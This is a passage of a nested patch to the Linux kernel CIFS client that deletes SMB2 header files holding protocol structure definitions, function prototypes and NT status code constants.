+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct durable_reconnect_context_v2 dcontext;
+-	__u8   Pad[4];
+-} __packed;
+-
+-/* See MS-SMB2 2.2.13.2.5 */
+-struct crt_twarp_ctxt {
+-	struct create_context ccontext;
+-	__u8	Name[8];
+-	__le64	Timestamp;
+-
+-} __packed;
+-
+-/* See MS-SMB2 2.2.13.2.9 */
+-struct crt_query_id_ctxt {
+-	struct create_context ccontext;
+-	__u8	Name[8];
+-} __packed;
+-
+-struct crt_sd_ctxt {
+-	struct create_context ccontext;
+-	__u8	Name[8];
+-	struct smb3_sd sd;
+-} __packed;
+-
+-
+-#define COPY_CHUNK_RES_KEY_SIZE	24
+-struct resume_key_req {
+-	char ResumeKey[COPY_CHUNK_RES_KEY_SIZE];
+-	__le32	ContextLength;	/* MBZ */
+-	char	Context[];	/* ignored, Windows sets to 4 bytes of zero */
+-} __packed;
+-
+-/* this goes in the ioctl buffer when doing a copychunk request */
+-struct copychunk_ioctl {
+-	char SourceKey[COPY_CHUNK_RES_KEY_SIZE];
+-	__le32 ChunkCount; /* we are only sending 1 */
+-	__le32 Reserved;
+-	/* array will only be one chunk long for us */
+-	__le64 SourceOffset;
+-	__le64 TargetOffset;
+-	__le32 Length; /* how many bytes to copy */
+-	__u32 Reserved2;
+-} __packed;
+-
+-struct copychunk_ioctl_rsp {
+-	__le32 ChunksWritten;
+-	__le32 ChunkBytesWritten;
+-	__le32 TotalBytesWritten;
+-} __packed;
+-
+-/* See MS-FSCC 2.3.29 and 2.3.30 */
+-struct get_retrieval_pointer_count_req {
+-	__le64 StartingVcn; /* virtual cluster number (signed) */
+-} __packed;
+-
+-struct get_retrieval_pointer_count_rsp {
+-	__le32 ExtentCount;
+-} __packed;
+-
+-/*
+- * See MS-FSCC 2.3.33 and 2.3.34
+- * request is the same as get_retrieval_point_count_req struct above
+- */
+-struct smb3_extents {
+-	__le64 NextVcn;
+-	__le64 Lcn; /* logical cluster number */
+-} __packed;
+-
+-struct get_retrieval_pointers_refcount_rsp {
+-	__le32 ExtentCount;
+-	__u32  Reserved;
+-	__le64 StartingVcn;
+-	struct smb3_extents extents[];
+-} __packed;
+-
+-/* See MS-DFSC 2.2.2 */
+-struct fsctl_get_dfs_referral_req {
+-	__le16 MaxReferralLevel;
+-	__u8 RequestFileName[];
+-} __packed;
+-
+-/* DFS response is struct get_dfs_refer_rsp */
+-
+-/* See MS-SMB2 2.2.31.3 */
+-struct network_resiliency_req {
+-	__le32 Timeout;
+-	__le32 Reserved;
+-} __packed;
+-/* There is no buffer for the response ie no struct network_resiliency_rsp */
+-
+-#define RSS_CAPABLE	cpu_to_le32(0x00000001)
+-#define RDMA_CAPABLE	cpu_to_le32(0x00000002)
+-
+-#define INTERNETWORK	cpu_to_le16(0x0002)
+-#define INTERNETWORKV6	cpu_to_le16(0x0017)
+-
+-struct network_interface_info_ioctl_rsp {
+-	__le32 Next; /* next interface. zero if this is last one */
+-	__le32 IfIndex;
+-	__le32 Capability; /* RSS or RDMA Capable */
+-	__le32 Reserved;
+-	__le64 LinkSpeed;
+-	__le16 Family;
+-	__u8 Buffer[126];
+-} __packed;
+-
+-struct iface_info_ipv4 {
+-	__be16 Port;
+-	__be32 IPv4Address;
+-	__be64 Reserved;
+-} __packed;
+-
+-struct iface_info_ipv6 {
+-	__be16 Port;
+-	__be32 FlowInfo;
+-	__u8   IPv6Address[16];
+-	__be32 ScopeId;
+-} __packed;
+-
+-#define NO_FILE_ID 0xFFFFFFFFFFFFFFFFULL /* general ioctls to srv not to file */
+-
+-struct compress_ioctl {
+-	__le16 CompressionState; /* See cifspdu.h for possible flag values */
+-} __packed;
+-
+-/*
+- * Maximum number of iovs we need for an ioctl request.
+- * [0] : struct smb2_ioctl_req
+- * [1] : in_data
+- */
+-#define SMB2_IOCTL_IOV_SIZE 2
+-
+-/*
+- *	PDU query infolevel structure definitions
+- *	BB consider moving to a different header
+- */
+-
+-struct smb2_file_full_ea_info { /* encoding of response for level 15 */
+-	__le32 next_entry_offset;
+-	__u8   flags;
+-	__u8   ea_name_length;
+-	__le16 ea_value_length;
+-	char   ea_data[]; /* \0 terminated name plus value */
+-} __packed; /* level 15 Set */
+-
+-struct smb2_file_reparse_point_info {
+-	__le64 IndexNumber;
+-	__le32 Tag;
+-} __packed;
+-
+-struct smb2_file_network_open_info {
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le32 Attributes;
+-	__le32 Reserved;
+-} __packed; /* level 34 Query also similar returned in close rsp and open rsp */
+-
+-/* See MS-FSCC 2.4.21 */
+-struct smb2_file_id_information {
+-	__le64	VolumeSerialNumber;
+-	__u64  PersistentFileId; /* opaque endianness */
+-	__u64  VolatileFileId; /* opaque endianness */
+-} __packed; /* level 59 */
+-
+-/* See MS-FSCC 2.4.18 */
+-struct smb2_file_id_extd_directory_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 FileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* EA size */
+-	__le32 ReparsePointTag; /* valid if FILE_ATTR_REPARSE_POINT set in FileAttributes */
+-	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit */
+-	char FileName[1];
+-} __packed; /* level 60 */
+-
+-extern char smb2_padding[7];
+-
+-/* equivalent of the contents of SMB3.1.1 POSIX open context response */
+-struct create_posix_rsp {
+-	u32 nlink;
+-	u32 reparse_tag;
+-	u32 mode;
+-	struct cifs_sid owner; /* var-sized on the wire */
+-	struct cifs_sid group; /* var-sized on the wire */
+-} __packed;
+-
+-#define SMB2_QUERY_DIRECTORY_IOV_SIZE 2
+-
+-/*
+- * SMB2-only POSIX info level for query dir
+- *
+- * See posix_info_sid_size(), posix_info_extra_size() and
+- * posix_info_parse() to help with the handling of this struct.
+- */
+-struct smb2_posix_info {
+-	__le32 NextEntryOffset;
+-	__u32 Ignored;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 DosAttributes;
+-	__le64 Inode;
+-	__le32 DeviceId;
+-	__le32 Zero;
+-	/* beginning of POSIX Create Context Response */
+-	__le32 HardLinks;
+-	__le32 ReparseTag;
+-	__le32 Mode;
+-	/*
+-	 * var sized owner SID
+-	 * var sized group SID
+-	 * le32 filenamelength
+-	 * u8  filename[]
+-	 */
+-} __packed;
+-
+-/*
+- * Parsed version of the above struct. Allows direct access to the
+- * variable length fields
+- */
+-struct smb2_posix_info_parsed {
+-	const struct smb2_posix_info *base;
+-	size_t size;
+-	struct cifs_sid owner;
+-	struct cifs_sid group;
+-	int name_len;
+-	const u8 *name;
+-};
+-
+-#endif				/* _SMB2PDU_H */
+diff --git a/fs/cifs/smb2proto.h b/fs/cifs/smb2proto.h
+deleted file mode 100644
+index be21b5d26f67e..0000000000000
+--- a/fs/cifs/smb2proto.h
++++ /dev/null
+@@ -1,284 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002, 2011
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- */
+-#ifndef _SMB2PROTO_H
+-#define _SMB2PROTO_H
+-#include <linux/nls.h>
+-#include <linux/key-type.h>
+-
+-struct statfs;
+-struct smb_rqst;
+-
+-/*
+- *****************************************************************
+- * All Prototypes
+- *****************************************************************
+- */
+-extern int map_smb2_to_linux_error(char *buf, bool log_err);
+-extern int smb2_check_message(char *buf, unsigned int length,
+-			      struct TCP_Server_Info *server);
+-extern unsigned int smb2_calc_size(void *buf);
+-extern char *smb2_get_data_area_len(int *off, int *len,
+-				    struct smb2_hdr *shdr);
+-extern __le16 *cifs_convert_path_to_utf16(const char *from,
+-					  struct cifs_sb_info *cifs_sb);
+-
+-extern int smb2_verify_signature(struct smb_rqst *, struct TCP_Server_Info *);
+-extern int smb2_check_receive(struct mid_q_entry *mid,
+-			      struct TCP_Server_Info *server, bool log_error);
+-extern struct mid_q_entry *smb2_setup_request(struct cifs_ses *ses,
+-					      struct TCP_Server_Info *,
+-					      struct smb_rqst *rqst);
+-extern struct mid_q_entry *smb2_setup_async_request(
+-			struct TCP_Server_Info *server, struct smb_rqst *rqst);
+-extern struct cifs_ses *smb2_find_smb_ses(struct TCP_Server_Info *server,
+-					   __u64 ses_id);
+-extern struct cifs_tcon *smb2_find_smb_tcon(struct TCP_Server_Info *server,
+-						__u64 ses_id, __u32  tid);
+-extern int smb2_calc_signature(struct smb_rqst *rqst,
+-				struct TCP_Server_Info *server,
+-				bool allocate_crypto);
+-extern int smb3_calc_signature(struct smb_rqst *rqst,
+-				struct TCP_Server_Info *server,
+-				bool allocate_crypto);
+-extern void smb2_echo_request(struct work_struct *work);
+-extern __le32 smb2_get_lease_state(struct cifsInodeInfo *cinode);
+-extern bool smb2_is_valid_oplock_break(char *buffer,
+-				       struct TCP_Server_Info *srv);
+-extern int smb3_handle_read_data(struct TCP_Server_Info *server,
+-				 struct mid_q_entry *mid);
+-extern int smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+-				struct cifs_sb_info *cifs_sb, const char *path,
+-				__u32 *reparse_tag);
+-int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+-			 struct cifs_sb_info *cifs_sb, const char *full_path,
+-			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
+-extern int smb2_set_path_size(const unsigned int xid, struct cifs_tcon *tcon,
+-			      const char *full_path, __u64 size,
+-			      struct cifs_sb_info *cifs_sb, bool set_alloc);
+-extern int smb2_set_file_info(struct inode *inode, const char *full_path,
+-			      FILE_BASIC_INFO *buf, const unsigned int xid);
+-extern int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
+-			       umode_t mode, struct cifs_tcon *tcon,
+-			       const char *full_path,
+-			       struct cifs_sb_info *cifs_sb);
+-extern int smb2_mkdir(const unsigned int xid, struct inode *inode,
+-		      umode_t mode, struct cifs_tcon *tcon,
+-		      const char *name, struct cifs_sb_info *cifs_sb);
+-extern void smb2_mkdir_setinfo(struct inode *inode, const char *full_path,
+-			       struct cifs_sb_info *cifs_sb,
+-			       struct cifs_tcon *tcon, const unsigned int xid);
+-extern int smb2_rmdir(const unsigned int xid, struct cifs_tcon *tcon,
+-		      const char *name, struct cifs_sb_info *cifs_sb);
+-extern int smb2_unlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		       const char *name, struct cifs_sb_info *cifs_sb);
+-extern int smb2_rename_path(const unsigned int xid, struct cifs_tcon *tcon,
+-			    const char *from_name, const char *to_name,
+-			    struct cifs_sb_info *cifs_sb);
+-extern int smb2_create_hardlink(const unsigned int xid, struct cifs_tcon *tcon,
+-				const char *from_name, const char *to_name,
+-				struct cifs_sb_info *cifs_sb);
+-extern int smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-			struct cifs_sb_info *cifs_sb, const unsigned char *path,
+-			char *pbuf, unsigned int *pbytes_written);
+-extern int smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-			  struct cifs_sb_info *cifs_sb,
+-			  const unsigned char *path, char *pbuf,
+-			  unsigned int *pbytes_read);
+-int smb2_parse_symlink_response(struct cifs_sb_info *cifs_sb, const struct kvec *iov, char **path);
+-int smb2_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
+-		   void *buf);
+-extern int smb2_unlock_range(struct cifsFileInfo *cfile,
+-			     struct file_lock *flock, const unsigned int xid);
+-extern int smb2_push_mandatory_locks(struct cifsFileInfo *cfile);
+-extern void smb2_reconnect_server(struct work_struct *work);
+-extern int smb3_crypto_aead_allocate(struct TCP_Server_Info *server);
+-extern unsigned long smb_rqst_len(struct TCP_Server_Info *server,
+-				  struct smb_rqst *rqst);
+-extern void smb2_set_next_command(struct cifs_tcon *tcon,
+-				  struct smb_rqst *rqst);
+-extern void smb2_set_related(struct smb_rqst *rqst);
+-
+-/*
+- * SMB2 Worker functions - most of protocol specific implementation details
+- * are contained within these calls.
+- */
+-extern int SMB2_negotiate(const unsigned int xid,
+-			  struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server);
+-extern int SMB2_sess_setup(const unsigned int xid, struct cifs_ses *ses,
+-			   struct TCP_Server_Info *server,
+-			   const struct nls_table *nls_cp);
+-extern int SMB2_logoff(const unsigned int xid, struct cifs_ses *ses);
+-extern int SMB2_tcon(const unsigned int xid, struct cifs_ses *ses,
+-		     const char *tree, struct cifs_tcon *tcon,
+-		     const struct nls_table *);
+-extern int SMB2_tdis(const unsigned int xid, struct cifs_tcon *tcon);
+-extern int SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms,
+-		     __le16 *path, __u8 *oplock,
+-		     struct smb2_file_all_info *buf,
+-		     struct create_posix_rsp *posix,
+-		     struct kvec *err_iov, int *resp_buftype);
+-extern int SMB2_open_init(struct cifs_tcon *tcon,
+-			  struct TCP_Server_Info *server,
+-			  struct smb_rqst *rqst,
+-			  __u8 *oplock, struct cifs_open_parms *oparms,
+-			  __le16 *path);
+-extern void SMB2_open_free(struct smb_rqst *rqst);
+-extern int SMB2_ioctl(const unsigned int xid, struct cifs_tcon *tcon,
+-		     u64 persistent_fid, u64 volatile_fid, u32 opcode,
+-		     char *in_data, u32 indatalen, u32 maxoutlen,
+-		     char **out_data, u32 *plen /* returned data len */);
+-extern int SMB2_ioctl_init(struct cifs_tcon *tcon,
+-			   struct TCP_Server_Info *server,
+-			   struct smb_rqst *rqst,
+-			   u64 persistent_fid, u64 volatile_fid, u32 opcode,
+-			   char *in_data, u32 indatalen,
+-			   __u32 max_response_size);
+-extern void SMB2_ioctl_free(struct smb_rqst *rqst);
+-extern int SMB2_change_notify(const unsigned int xid, struct cifs_tcon *tcon,
+-			u64 persistent_fid, u64 volatile_fid, bool watch_tree,
+-			u32 completion_filter, u32 max_out_data_len,
+-			char **out_data, u32 *plen /* returned data len */);
+-
+-extern int __SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+-			u64 persistent_fid, u64 volatile_fid,
+-			struct smb2_file_network_open_info *pbuf);
+-extern int SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+-		      u64 persistent_file_id, u64 volatile_file_id);
+-extern int SMB2_close_init(struct cifs_tcon *tcon,
+-			   struct TCP_Server_Info *server,
+-			   struct smb_rqst *rqst,
+-			   u64 persistent_fid, u64 volatile_fid,
+-			   bool query_attrs);
+-extern void SMB2_close_free(struct smb_rqst *rqst);
+-extern int SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon,
+-		      u64 persistent_file_id, u64 volatile_file_id);
+-extern int SMB2_flush_init(const unsigned int xid, struct smb_rqst *rqst,
+-			   struct cifs_tcon *tcon,
+-			   struct TCP_Server_Info *server,
+-			   u64 persistent_file_id, u64 volatile_file_id);
+-extern void SMB2_flush_free(struct smb_rqst *rqst);
+-extern int SMB311_posix_query_info(const unsigned int xid, struct cifs_tcon *tcon,
+-		u64 persistent_fid, u64 volatile_fid, struct smb311_posix_qinfo *data, u32 *plen);
+-extern int SMB2_query_info(const unsigned int xid, struct cifs_tcon *tcon,
+-			   u64 persistent_file_id, u64 volatile_file_id,
+-			   struct smb2_file_all_info *data);
+-extern int SMB2_query_info_init(struct cifs_tcon *tcon,
+-				struct TCP_Server_Info *server,
+-				struct smb_rqst *rqst,
+-				u64 persistent_fid, u64 volatile_fid,
+-				u8 info_class, u8 info_type,
+-				u32 additional_info, size_t output_len,
+-				size_t input_len, void *input);
+-extern void SMB2_query_info_free(struct smb_rqst *rqst);
+-extern int SMB2_query_acl(const unsigned int xid, struct cifs_tcon *tcon,
+-			  u64 persistent_file_id, u64 volatile_file_id,
+-			  void **data, unsigned int *plen, u32 info);
+-extern int SMB2_get_srv_num(const unsigned int xid, struct cifs_tcon *tcon,
+-			    u64 persistent_fid, u64 volatile_fid,
+-			    __le64 *uniqueid);
+-extern int smb2_async_readv(struct cifs_readdata *rdata);
+-extern int SMB2_read(const unsigned int xid, struct cifs_io_parms *io_parms,
+-		     unsigned int *nbytes, char **buf, int *buf_type);
+-extern int smb2_async_writev(struct cifs_writedata *wdata,
+-			     void (*release)(struct kref *kref));
+-extern int SMB2_write(const unsigned int xid, struct cifs_io_parms *io_parms,
+-		      unsigned int *nbytes, struct kvec *iov, int n_vec);
+-extern int SMB2_echo(struct TCP_Server_Info *server);
+-extern int SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
+-				u64 persistent_fid, u64 volatile_fid, int index,
+-				struct cifs_search_info *srch_inf);
+-extern int SMB2_query_directory_init(unsigned int xid, struct cifs_tcon *tcon,
+-				     struct TCP_Server_Info *server,
+-				     struct smb_rqst *rqst,
+-				     u64 persistent_fid, u64 volatile_fid,
+-				     int index, int info_level);
+-extern void SMB2_query_directory_free(struct smb_rqst *rqst);
+-extern int SMB2_set_eof(const unsigned int xid, struct cifs_tcon *tcon,
+-			u64 persistent_fid, u64 volatile_fid, u32 pid,
+-			__le64 *eof);
+-extern int SMB2_set_info_init(struct cifs_tcon *tcon,
+-			      struct TCP_Server_Info *server,
+-			      struct smb_rqst *rqst,
+-			      u64 persistent_fid, u64 volatile_fid, u32 pid,
+-			      u8 info_class, u8 info_type, u32 additional_info,
+-			      void **data, unsigned int *size);
+-extern void SMB2_set_info_free(struct smb_rqst *rqst);
+-extern int SMB2_set_acl(const unsigned int xid, struct cifs_tcon *tcon,
+-			u64 persistent_fid, u64 volatile_fid,
+-			struct cifs_ntsd *pnntsd, int pacllen, int aclflag);
+-extern int SMB2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+-		       u64 persistent_fid, u64 volatile_fid,
+-		       struct smb2_file_full_ea_info *buf, int len);
+-extern int SMB2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
+-				u64 persistent_fid, u64 volatile_fid);
+-extern int SMB2_oplock_break(const unsigned int xid, struct cifs_tcon *tcon,
+-			     const u64 persistent_fid, const u64 volatile_fid,
+-			     const __u8 oplock_level);
+-extern int smb2_handle_cancelled_close(struct cifs_tcon *tcon,
+-				       __u64 persistent_fid,
+-				       __u64 volatile_fid);
+-extern int smb2_handle_cancelled_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server);
+-void smb2_cancelled_close_fid(struct work_struct *work);
+-extern int SMB2_QFS_info(const unsigned int xid, struct cifs_tcon *tcon,
+-			 u64 persistent_file_id, u64 volatile_file_id,
+-			 struct kstatfs *FSData);
+-extern int SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
+-			 u64 persistent_file_id, u64 volatile_file_id,
+-			 struct kstatfs *FSData);
+-extern int SMB2_QFS_attr(const unsigned int xid, struct cifs_tcon *tcon,
+-			 u64 persistent_file_id, u64 volatile_file_id, int lvl);
+-extern int SMB2_lock(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const __u64 persist_fid, const __u64 volatile_fid,
+-		     const __u32 pid, const __u64 length, const __u64 offset,
+-		     const __u32 lockFlags, const bool wait);
+-extern int smb2_lockv(const unsigned int xid, struct cifs_tcon *tcon,
+-		      const __u64 persist_fid, const __u64 volatile_fid,
+-		      const __u32 pid, const __u32 num_lock,
+-		      struct smb2_lock_element *buf);
+-extern int SMB2_lease_break(const unsigned int xid, struct cifs_tcon *tcon,
+-			    __u8 *lease_key, const __le32 lease_state);
+-extern int smb3_validate_negotiate(const unsigned int, struct cifs_tcon *);
+-
+-extern enum securityEnum smb2_select_sectype(struct TCP_Server_Info *,
+-					enum securityEnum);
+-extern void smb2_parse_contexts(struct TCP_Server_Info *server,
+-				struct smb2_create_rsp *rsp,
+-				unsigned int *epoch, char *lease_key,
+-				__u8 *oplock, struct smb2_file_all_info *buf,
+-				struct create_posix_rsp *posix);
+-extern int smb3_encryption_required(const struct cifs_tcon *tcon);
+-extern int smb2_validate_iov(unsigned int offset, unsigned int buffer_length,
+-			     struct kvec *iov, unsigned int min_buf_size);
+-extern int smb2_validate_and_copy_iov(unsigned int offset,
+-				      unsigned int buffer_length,
+-				      struct kvec *iov,
+-				      unsigned int minbufsize, char *data);
+-extern void smb2_copy_fs_info_to_kstatfs(
+-	 struct smb2_fs_full_size_info *pfs_inf,
+-	 struct kstatfs *kst);
+-extern int smb311_crypto_shash_allocate(struct TCP_Server_Info *server);
+-extern int smb311_update_preauth_hash(struct cifs_ses *ses,
+-				      struct TCP_Server_Info *server,
+-				      struct kvec *iov, int nvec);
+-extern int smb2_query_info_compound(const unsigned int xid,
+-				    struct cifs_tcon *tcon,
+-				    const char *path, u32 desired_access,
+-				    u32 class, u32 type, u32 output_len,
+-				    struct kvec *rsp, int *buftype,
+-				    struct cifs_sb_info *cifs_sb);
+-/* query path info from the server using SMB311 POSIX extensions*/
+-int smb311_posix_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+-				 struct cifs_sb_info *cifs_sb, const char *full_path,
+-				 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
+-int posix_info_parse(const void *beg, const void *end,
+-		     struct smb2_posix_info_parsed *out);
+-int posix_info_sid_size(const void *beg, const void *end);
+-#endif			/* _SMB2PROTO_H */
+diff --git a/fs/cifs/smb2status.h b/fs/cifs/smb2status.h
+deleted file mode 100644
+index a9e958166fc53..0000000000000
+--- a/fs/cifs/smb2status.h
++++ /dev/null
+@@ -1,1769 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   SMB2 Status code (network error) definitions
+- *   Definitions are from MS-ERREF
+- *
+- *   Copyright (c) International Business Machines  Corp., 2009,2011
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-/*
+- *  0 1 2 3 4 5 6 7 8 9 0 A B C D E F 0 1 2 3 4 5 6 7 8 9 A B C D E F
+- *  SEV C N <-------Facility--------> <------Error Status Code------>
+- *
+- *  C is set if "customer defined" error, N bit is reserved and MBZ
+- */
+-
+-#define STATUS_SEVERITY_SUCCESS __constant_cpu_to_le32(0x0000)
+-#define STATUS_SEVERITY_INFORMATIONAL cpu_to_le32(0x0001)
+-#define STATUS_SEVERITY_WARNING cpu_to_le32(0x0002)
+-#define STATUS_SEVERITY_ERROR cpu_to_le32(0x0003)
+-
+-struct ntstatus {
+-	/* Facility is the high 12 bits of the following field */
+-	__le32 Facility; /* low 2 bits Severity, next is Customer, then rsrvd */
+-	__le32 Code;
+-};
+-
+-#define STATUS_SUCCESS cpu_to_le32(0x00000000)
+-#define STATUS_WAIT_0 cpu_to_le32(0x00000000)
+-#define STATUS_WAIT_1 cpu_to_le32(0x00000001)
+-#define STATUS_WAIT_2 cpu_to_le32(0x00000002)
+-#define STATUS_WAIT_3 cpu_to_le32(0x00000003)
+-#define STATUS_WAIT_63 cpu_to_le32(0x0000003F)
+-#define STATUS_ABANDONED cpu_to_le32(0x00000080)
+-#define STATUS_ABANDONED_WAIT_0 cpu_to_le32(0x00000080)
+-#define STATUS_ABANDONED_WAIT_63 cpu_to_le32(0x000000BF)
+-#define STATUS_USER_APC cpu_to_le32(0x000000C0)
+-#define STATUS_KERNEL_APC cpu_to_le32(0x00000100)
+-#define STATUS_ALERTED cpu_to_le32(0x00000101)
+-#define STATUS_TIMEOUT cpu_to_le32(0x00000102)
+-#define STATUS_PENDING cpu_to_le32(0x00000103)
+-#define STATUS_REPARSE cpu_to_le32(0x00000104)
+-#define STATUS_MORE_ENTRIES cpu_to_le32(0x00000105)
+-#define STATUS_NOT_ALL_ASSIGNED cpu_to_le32(0x00000106)
+-#define STATUS_SOME_NOT_MAPPED cpu_to_le32(0x00000107)
+-#define STATUS_OPLOCK_BREAK_IN_PROGRESS cpu_to_le32(0x00000108)
+-#define STATUS_VOLUME_MOUNTED cpu_to_le32(0x00000109)
+-#define STATUS_RXACT_COMMITTED cpu_to_le32(0x0000010A)
+-#define STATUS_NOTIFY_CLEANUP cpu_to_le32(0x0000010B)
+-#define STATUS_NOTIFY_ENUM_DIR cpu_to_le32(0x0000010C)
+-#define STATUS_NO_QUOTAS_FOR_ACCOUNT cpu_to_le32(0x0000010D)
+-#define STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED cpu_to_le32(0x0000010E)
+-#define STATUS_PAGE_FAULT_TRANSITION cpu_to_le32(0x00000110)
+-#define STATUS_PAGE_FAULT_DEMAND_ZERO cpu_to_le32(0x00000111)
+-#define STATUS_PAGE_FAULT_COPY_ON_WRITE cpu_to_le32(0x00000112)
+-#define STATUS_PAGE_FAULT_GUARD_PAGE cpu_to_le32(0x00000113)
+-#define STATUS_PAGE_FAULT_PAGING_FILE cpu_to_le32(0x00000114)
+-#define STATUS_CACHE_PAGE_LOCKED cpu_to_le32(0x00000115)
+-#define STATUS_CRASH_DUMP cpu_to_le32(0x00000116)
+-#define STATUS_BUFFER_ALL_ZEROS cpu_to_le32(0x00000117)
+-#define STATUS_REPARSE_OBJECT cpu_to_le32(0x00000118)
+-#define STATUS_RESOURCE_REQUIREMENTS_CHANGED cpu_to_le32(0x00000119)
+-#define STATUS_TRANSLATION_COMPLETE cpu_to_le32(0x00000120)
+-#define STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY cpu_to_le32(0x00000121)
+-#define STATUS_NOTHING_TO_TERMINATE cpu_to_le32(0x00000122)
+-#define STATUS_PROCESS_NOT_IN_JOB cpu_to_le32(0x00000123)
+-#define STATUS_PROCESS_IN_JOB cpu_to_le32(0x00000124)
+-#define STATUS_VOLSNAP_HIBERNATE_READY cpu_to_le32(0x00000125)
+-#define STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY cpu_to_le32(0x00000126)
+-#define STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED cpu_to_le32(0x00000127)
+-#define STATUS_INTERRUPT_STILL_CONNECTED cpu_to_le32(0x00000128)
+-#define STATUS_PROCESS_CLONED cpu_to_le32(0x00000129)
+-#define STATUS_FILE_LOCKED_WITH_ONLY_READERS cpu_to_le32(0x0000012A)
+-#define STATUS_FILE_LOCKED_WITH_WRITERS cpu_to_le32(0x0000012B)
+-#define STATUS_RESOURCEMANAGER_READ_ONLY cpu_to_le32(0x00000202)
+-#define STATUS_WAIT_FOR_OPLOCK cpu_to_le32(0x00000367)
+-#define DBG_EXCEPTION_HANDLED cpu_to_le32(0x00010001)
+-#define DBG_CONTINUE cpu_to_le32(0x00010002)
+-#define STATUS_FLT_IO_COMPLETE cpu_to_le32(0x001C0001)
+-#define STATUS_OBJECT_NAME_EXISTS cpu_to_le32(0x40000000)
+-#define STATUS_THREAD_WAS_SUSPENDED cpu_to_le32(0x40000001)
+-#define STATUS_WORKING_SET_LIMIT_RANGE cpu_to_le32(0x40000002)
+-#define STATUS_IMAGE_NOT_AT_BASE cpu_to_le32(0x40000003)
+-#define STATUS_RXACT_STATE_CREATED cpu_to_le32(0x40000004)
+-#define STATUS_SEGMENT_NOTIFICATION cpu_to_le32(0x40000005)
+-#define STATUS_LOCAL_USER_SESSION_KEY cpu_to_le32(0x40000006)
+-#define STATUS_BAD_CURRENT_DIRECTORY cpu_to_le32(0x40000007)
+-#define STATUS_SERIAL_MORE_WRITES cpu_to_le32(0x40000008)
+-#define STATUS_REGISTRY_RECOVERED cpu_to_le32(0x40000009)
+-#define STATUS_FT_READ_RECOVERY_FROM_BACKUP cpu_to_le32(0x4000000A)
+-#define STATUS_FT_WRITE_RECOVERY cpu_to_le32(0x4000000B)
+-#define STATUS_SERIAL_COUNTER_TIMEOUT cpu_to_le32(0x4000000C)
+-#define STATUS_NULL_LM_PASSWORD cpu_to_le32(0x4000000D)
+-#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH cpu_to_le32(0x4000000E)
+-#define STATUS_RECEIVE_PARTIAL cpu_to_le32(0x4000000F)
+-#define STATUS_RECEIVE_EXPEDITED cpu_to_le32(0x40000010)
+-#define STATUS_RECEIVE_PARTIAL_EXPEDITED cpu_to_le32(0x40000011)
+-#define STATUS_EVENT_DONE cpu_to_le32(0x40000012)
+-#define STATUS_EVENT_PENDING cpu_to_le32(0x40000013)
+-#define STATUS_CHECKING_FILE_SYSTEM cpu_to_le32(0x40000014)
+-#define STATUS_FATAL_APP_EXIT cpu_to_le32(0x40000015)
+-#define STATUS_PREDEFINED_HANDLE cpu_to_le32(0x40000016)
+-#define STATUS_WAS_UNLOCKED cpu_to_le32(0x40000017)
+-#define STATUS_SERVICE_NOTIFICATION cpu_to_le32(0x40000018)
+-#define STATUS_WAS_LOCKED cpu_to_le32(0x40000019)
+-#define STATUS_LOG_HARD_ERROR cpu_to_le32(0x4000001A)
+-#define STATUS_ALREADY_WIN32 cpu_to_le32(0x4000001B)
+-#define STATUS_WX86_UNSIMULATE cpu_to_le32(0x4000001C)
+-#define STATUS_WX86_CONTINUE cpu_to_le32(0x4000001D)
+-#define STATUS_WX86_SINGLE_STEP cpu_to_le32(0x4000001E)
+-#define STATUS_WX86_BREAKPOINT cpu_to_le32(0x4000001F)
+-#define STATUS_WX86_EXCEPTION_CONTINUE cpu_to_le32(0x40000020)
+-#define STATUS_WX86_EXCEPTION_LASTCHANCE cpu_to_le32(0x40000021)
+-#define STATUS_WX86_EXCEPTION_CHAIN cpu_to_le32(0x40000022)
+-#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE cpu_to_le32(0x40000023)
